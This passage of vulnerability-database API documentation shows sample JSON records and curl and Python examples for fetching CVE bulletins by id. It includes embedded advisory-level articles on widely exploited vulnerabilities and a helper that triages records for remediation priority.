access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised devices. They allow an actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. 
**CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-44228, or "Log4Shell," is a severe vulnerability in Apache's log4j Java library. The flaw exploits the 'lookups' feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. 
**CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash's processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. 
**CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. 
**CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-19781, or "Shitrix," is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user's context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. 
**CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users' mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. 
**\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian's Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3-1070x588.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. 
Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights & Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**",
"published": "2023-09-04T14:00:00",
"type": "qualysblog",
"title": "Qualys Top 20 Most Exploited Vulnerabilities"
},
{
"cvelist": [
"CVE-2023-20890",
"CVE-2023-20900",
"CVE-2023-34039"
],
"description": "[![SSH Auth Bypass Vulnerability](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjE4D8MhqYWhfOd2aFpaVvixDOV5nqQyXiMBd139w2Jpvafo4jbxBZb67rbGUsBQGPRZXiZ-SHUBx7swBloTSp-zcUZOaJJHmtml2DKIPhpb0BbyUObsy_u1BBNtROerY_zG41faeFdJnc81KF2uLkLuSFBHt7h_32nWsKDAEpauo0kNvWDGetxuzCRHV4D/s728-e365/exploit.jpg>)\n\nProof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight).\n\nThe flaw, tracked as [CVE-2023-34039](<https://thehackernews.com/2023/08/critical-vulnerability-alert-vmware.html>), is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation.\n\n\"A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI,\" VMware said earlier this week.\n\nSummoning Team's Sina Kheirkhah, who published the PoC following an analysis of the patch released by VMware, said the root cause can be traced back to a bash script containing a method named refresh_ssh_keys(), which is responsible for overwriting the current SSH keys for the support and ubuntu users in the authorized_keys file.\n\n\"There is SSH authentication in place; however, VMware forgot to regenerate the keys,\" Kheirkhah [said](<https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/>). 
\"VMware's Aria Operations for Networks had hard-coded its keys from version 6.0 to 6.10.\"\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nVMware's latest fixes also address CVE-2023-20890, an arbitrary file write vulnerability impacting Aria Operations for Networks that could be abused by an adversary with administrative access to write files to arbitrary locations and achieve remote code execution.\n\nIn other words, a threat actor could leverage the PoC to obtain admin access to the device and exploit CVE-2023-20890 to run arbitrary payloads, making it crucial that users apply the updates to secure against potential threats.\n\nThe release of the PoC coincides with the virtualization technology giant issuing fixes for a high-severity SAML token signature bypass flaw (CVE-2023-20900, CVSS score: 7.5) across several Windows and Linux versions of VMware Tools.\n\n\"A malicious actor with man-in-the-middle (MITM) network positioning in the virtual machine network may be able to bypass SAML token signature verification, to perform VMware Tools Guest Operations,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2023-0019.html>) in an advisory released Thursday.\n\nPeter St\u00f6ckli of GitHub Security Lab has been credited with reporting the flaw, which affects the following versions -\n\n * VMware Tools for Windows (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0\n * VMware Tools for Linux (10.3.x) - Fixed in 10.3.26\n * Open-source implementation of VMware Tools for Linux or open-vm-tools (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0 (to be distributed by Linux vendors)\n\nThe development also comes as Fortinet FortiGuard Labs [warned](<https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities>) of continued exploitation of [Adobe ColdFusion 
Vulnerabilities](<https://thehackernews.com/2023/07/adobe-rolls-out-new-patches-for.html>) by threat actors to deploy cryptocurrency miners and [hybrid bots](<https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/>) such as Satan DDoS (aka Lucifer) and RudeMiner (aka SpreadMiner) that are capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nAlso deployed is a backdoor named [BillGates](<https://www.trendmicro.com/en_us/research/19/g/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databases-into-ddos-botnet-zombies.html>) (aka [Setag](<https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server>)), which is known for hijacking systems, stealing sensitive information, and initiating DDoS attacks.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
"published": "2023-09-03T04:42:00",
"type": "thn",
"title": "PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability"
}
]
Full data by id¶
Returns the full record for a single bulletin, looked up by its identifier.
Required parameters:
- id (str): bulletin id
- apiKey: Activated API key
Query:
POST /api/v3/search/id/
Query example:
curl -XPOST https://vulners.com/api/v3/search/id -H 'Content-Type: application/json' -d '{
"id": "CVE-2024-21762",
"fields": ["*"],
"apiKey": "{API key}"
}'
CVE_2024_21762 = vulners_api.get_bulletin("CVE-2024-21762", fields=["*"])
{
"id": "CVE-2024-21762",
"vendorId": null,
"type": "cve",
"bulletinFamily": "NVD",
"title": "CVE-2024-21762",
"description": "A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests",
"published": "2024-02-09T09:15:08",
"modified": "2024-02-10T02:00:01",
"epss": [
{
"cve": "CVE-2024-21762",
"epss": 0.01179,
"percentile": 0.84607,
"modified": "2024-02-12"
}
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5
},
"severity": "HIGH",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
},
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-21762",
"reporter": "[email protected]",
"references": [
"https://fortiguard.com/psirt/FG-IR-24-015"
],
"cvelist": [
"CVE-2024-21762"
],
"immutableFields": [],
"lastseen": "2024-02-12T15:22:04",
"viewCount": 47,
"enchantments": {
"short_description": "CVE-2024-21762: Out-of-bounds write in Fortinet FortiOS versions, allowing unauthorized code executio",
"tags": [
"cve-2024-21762",
"fortinet",
"fortios",
"out-of-bounds write",
"unauthorized code execution",
"security vulnerability",
"nvd"
],
"dependencies": {
"references": [
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2024-21762"
]
},
{
"type": "hivepro",
"idList": [
"HIVEPRO:4FDFE6EE844A7B3ED3D4E07DA047CFCA"
]
},
{
"type": "nessus",
"idList": [
"FORTIGATE_FG-IR-24-015.NASL"
]
},
{
"type": "prion",
"idList": [
"PRION:CVE-2024-21762"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:0E907B2DDA83198AFC222340903BE902"
]
},
{
"type": "thn",
"idList": [
"THN:F60A4974F1101ED1147C3C221F8FF1EF"
]
},
{
"type": "wizblog",
"idList": [
"WIZBLOG:73EB08B6610483BFE7972345C53E5AD8"
]
}
]
},
"score": {
"value": 7.9,
"uncertanity": 1.7,
"vector": "NONE"
},
"exploitation": {
"wildExploitedSources": [
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2024-21762"
]
}
],
"wildExploited": true
},
"reddit": {
"counter": 90,
"posts": [
{
"link": "https://www.reddit.com/r/fortinet/comments/1aodfgl/iocs_for_cve202421762/",
"text": "IOCsforCVE-2024-21762",
"author": "tacticalAlmonds",
"author_photo": "https://www.redditstatic.com/avatars/defaults/v2/avatar_default_3.png",
"date": "2024-02-11T20:32:44+00:00"
}
]
},
"vulnersScore": 7.9
},
"cna_cvss": {
"cna": "fortinet",
"cvss": {
"3": {
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C",
"score": 9.6
}
}
},
"cpe": [],
"cpe23": [],
"cwe": [
"CWE-787"
],
"affectedSoftware": [],
"affectedConfiguration": [],
"cpeConfiguration": {},
"extraReferences": [
{
"url": "https://fortiguard.com/psirt/FG-IR-24-015",
"source": "[email protected]"
}
],
"product_info": [
{
"vendor": "Fortinet",
"product": "FortiOS"
},
{
"vendor": "Fortinet",
"product": "FortiProxy"
}
],
"solutions": [
{
"lang": "en",
"value": "Please upgrade to FortiProxy version 7.4.3 or above \nPlease upgrade to FortiProxy version 7.2.9 or above \nPlease upgrade to FortiProxy version 7.0.15 or above \nPlease upgrade to FortiProxy version 2.0.14 or above \nPlease upgrade to FortiOS version 7.6.0 or above \nPlease upgrade to FortiOS version 7.4.3 or above \nPlease upgrade to FortiOS version 7.2.7 or above \nPlease upgrade to FortiOS version 7.0.14 or above \nPlease upgrade to FortiOS version 6.4.15 or above \nPlease upgrade to FortiOS version 6.2.16 or above \n"
}
],
"workarounds": [],
"impacts": [],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"cweId": "CWE-787",
"description": "Execute unauthorized code or commands",
"type": "CWE"
}
]
}
],
"exploits": [],
"assigned": "2024-01-02T10:15:00"
}
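As an added example (not from the Vulners documentation or SDK), the following Python builds the request body for this endpoint and triages a bulletin in the JSON format shown above into the fields a remediation owner needs (NVD and CNA CVSS, EPSS, in-the-wild exploitation sources, fixed versions); it also handles the dict keyed by bulletin id that the endpoint returns for a list of ids. The trimmed sample bulletin and the P1/P2/P3 thresholds are assumptions made for this example.

```python
"""Added example (not part of the Vulners docs or SDK): build the body for
POST /api/v3/search/id and triage the bulletin JSON it returns."""
import json
import re
from typing import Any, Dict, List, Tuple, Union

# Constructed sample: a trimmed copy of the CVE-2024-21762 bulletin shown above,
# keeping only the fields this helper reads (solutions shortened to three lines).
SAMPLE_BULLETIN: Dict[str, Any] = json.loads(r"""
{
  "id": "CVE-2024-21762",
  "type": "cve",
  "epss": [{"cve": "CVE-2024-21762", "epss": 0.01179, "percentile": 0.84607,
            "modified": "2024-02-12"}],
  "cvss3": {"cvssV3": {"version": "3.1",
                       "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                       "baseScore": 9.8, "baseSeverity": "CRITICAL"}},
  "enchantments": {
    "exploitation": {
      "wildExploitedSources": [{"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2024-21762"]}],
      "wildExploited": true
    },
    "vulnersScore": 7.9
  },
  "cna_cvss": {"cna": "fortinet", "cvss": {"3": {"score": 9.6}}},
  "cwe": ["CWE-787"],
  "solutions": [{"lang": "en",
                 "value": "Please upgrade to FortiProxy version 7.4.3 or above \nPlease upgrade to FortiOS version 7.4.3 or above \nPlease upgrade to FortiOS version 7.2.7 or above \n"}]
}
""")


def build_id_request(ids: Union[str, List[str]], api_key: str,
                     fields: Tuple[str, ...] = ("*",)) -> Dict[str, Any]:
    """Body for POST /api/v3/search/id: a single id string or a list of ids,
    mirroring the two curl examples in this section of the docs."""
    return {"id": ids if isinstance(ids, str) else list(ids),
            "fields": list(fields), "apiKey": api_key}


_UPGRADE_RE = re.compile(r"upgrade to (\S+) version (\S+) or above")


def fixed_versions(bulletin: Dict[str, Any]) -> List[Tuple[str, str]]:
    """Parse the free-text 'solutions' entries into (product, fixed_version) pairs."""
    pairs: List[Tuple[str, str]] = []
    for sol in bulletin.get("solutions", []):
        pairs.extend(_UPGRADE_RE.findall(sol.get("value", "")))
    return pairs


def exploited_sources(bulletin: Dict[str, Any]) -> List[str]:
    """Source types (e.g. cisa_kev, attackerkb) that report in-the-wild exploitation."""
    expl = bulletin.get("enchantments", {}).get("exploitation", {})
    return [src.get("type", "") for src in expl.get("wildExploitedSources", [])]


def triage(bulletin: Dict[str, Any]) -> Dict[str, Any]:
    """Pull the fields a remediation owner needs and assign a priority.
    The rule is an assumption for this example, not a Vulners policy:
    P1 if exploited in the wild, P2 if NVD CVSSv3 >= 9.0 or EPSS >= 0.1, else P3."""
    cvss3 = bulletin.get("cvss3", {}).get("cvssV3", {})
    nvd_score = cvss3.get("baseScore")
    cna_score = bulletin.get("cna_cvss", {}).get("cvss", {}).get("3", {}).get("score")
    epss_vals = [e.get("epss", 0.0) for e in bulletin.get("epss", [])]
    epss = max(epss_vals) if epss_vals else None
    wild = bool(bulletin.get("enchantments", {}).get("exploitation", {}).get("wildExploited"))
    if wild:
        priority = "P1"
    elif (nvd_score or 0.0) >= 9.0 or (epss or 0.0) >= 0.1:
        priority = "P2"
    else:
        priority = "P3"
    return {
        "id": bulletin.get("id"),
        "priority": priority,
        "nvd_cvss3": nvd_score,
        "cna_cvss3": cna_score,
        # NVD and the CNA can disagree by a lot; flag a gap of a full point or more
        # so the record is reviewed rather than trusted on one score alone
        "cvss_disagreement": (nvd_score is not None and cna_score is not None
                              and abs(nvd_score - cna_score) >= 1.0),
        "epss": epss,
        "wild_exploited": wild,
        "exploited_sources": exploited_sources(bulletin),
        "cwe": bulletin.get("cwe", []),
        "fixed_versions": fixed_versions(bulletin),
    }


def triage_many(response: Dict[str, Dict[str, Any]]) -> Dict[str, Dict[str, Any]]:
    """Apply triage() to the {id: bulletin} dict returned for a list of ids."""
    return {cve_id: triage(b) for cve_id, b in response.items()}


if __name__ == "__main__":
    print(json.dumps(build_id_request(["CVE-2023-6548", "CVE-2023-6549"], "{API key}"), indent=2))
    print(json.dumps(triage(SAMPLE_BULLETIN), indent=2))
```

To use it against live data, send `build_id_request(...)` as the JSON body of the POST shown above and pass the returned bulletin (or the id-keyed dict) to `triage` or `triage_many`.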
Full data by id list¶
To obtain full information on a list of bulletins, please specify the identifiers of the required documents.
Required parameters:
- id (list): bulletin ids
- apiKey: Activated API key
Query:
POST /api/v3/search/id/
Query example:
curl -XPOST https://vulners.com/api/v3/search/id -H 'Content-Type: application/json' -d '{
"id": [
"CVE-2023-6548",
"CVE-2023-6549"],
"fields": ["*"],
"apiKey": "{API key}"
}'
multiple_cves = vulners_api.get_multiple_bulletins(id=["CVE-2023-6548", "CVE-2023-6549"], fields=["*"])
{
"CVE-2023-6548": {
"id": "CVE-2023-6548",
"vendorId": null,
"type": "cve",
"bulletinFamily": "NVD",
"title": "CVE-2023-6548",
"description": "Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway\u00a0allows an attacker with\u00a0access\u00a0to NSIP, CLIP or SNIP with management interface to perform\u00a0Authenticated (low privileged) remote code execution on Management Interface.",
"published": "2024-01-17T20:15:50",
"modified": "2024-01-25T16:45:58",
"epss": [
{
"cve": "CVE-2023-6548",
"epss": 0.01075,
"percentile": 0.838,
"modified": "2024-02-11"
}
],
"cvss": {
"score": 6.5,
"vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5
},
"severity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
}
},
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6548",
"reporter": "[email protected]",
"references": [
"https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549"
],
"cvelist": [
"CVE-2023-6548"
],
"immutableFields": [],
"lastseen": "2024-02-12T11:56:59",
"viewCount": 69,
"enchantments": {
"score": {
"value": 6.5,
"uncertanity": 0.2,
"vector": "NONE"
},
"dependencies": {
"references": [
{
"type": "attackerkb",
"idList": [
"AKB:BA3D9466-011E-4807-82FD-0DC03734CDDD"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6548"
]
},
{
"type": "citrix",
"idList": [
"CTX584986"
]
},
{
"type": "hivepro",
"idList": [
"HIVEPRO:E7C0D983EAA9A4C2CE2DCCCCA4B407DD"
]
},
{
"type": "malwarebytes",
"idList": [
"MALWAREBYTES:6CCC816574632169A05704CE0E1928C8"
]
},
{
"type": "nessus",
"idList": [
"NETSCALER_ADC_GATEWAY_CTX584986.NASL"
]
},
{
"type": "prion",
"idList": [
"PRION:CVE-2023-6548"
]
},
{
"type": "thn",
"idList": [
"THN:55036E69D47D64800FB4CB6F8068DA4F"
]
}
]
},
"reddit": {
"counter": 24,
"posts": [
{
"link": "https://www.reddit.com/r/CTI/comments/19a0a8c/cisa_adds_chrome_and_citrix_netscaler_to_its/",
"text": "CISAaddsChromeandCitrixNetScalertoitsKnownExploitedVulnerabilitiescatalog",
"author": "SirEliasRiddle",
"author_photo": "https://i.redd.it/snoovatar/avatars/nftv2_bmZ0X2VpcDE1NToxMzdfNDY2YTMzMDg4N2JkZjYyZDUzZjk2OGVhODI0NzkzMTUwZjA3NzYyZV8xMTkzMjQ5_rare_892c4323-6b60-487d-9278-5c0b90c591d4-headshot.png",
"date": "2024-01-18T23:43:43+00:00"
}
]
},
"exploitation": {
"wildExploitedSources": [
{
"type": "attackerkb",
"idList": [
"AKB:BA3D9466-011E-4807-82FD-0DC03734CDDD"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6548"
]
}
],
"wildExploited": true
},
"short_description": "CVE-2023-6548: Security vulnerability in a component of Vendor Product Version on multiple platforms allows attackers to impact via a specific vector",
"tags": [
"cve-2023-6548",
"security vulnerability",
"component",
"vendor",
"product",
"version",
"attack",
"impact",
"vector",
"nvd"
],
"vulnersScore": 6.5
},
"cna_cvss": {
"cna": "Citrix",
"cvss": {
"3": {
"vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"score": 5.5
}
}
},
"cpe": [],
"cpe23": [],
"cwe": [
"CWE-94",
"CWE-94"
],
"affectedSoftware": [
{
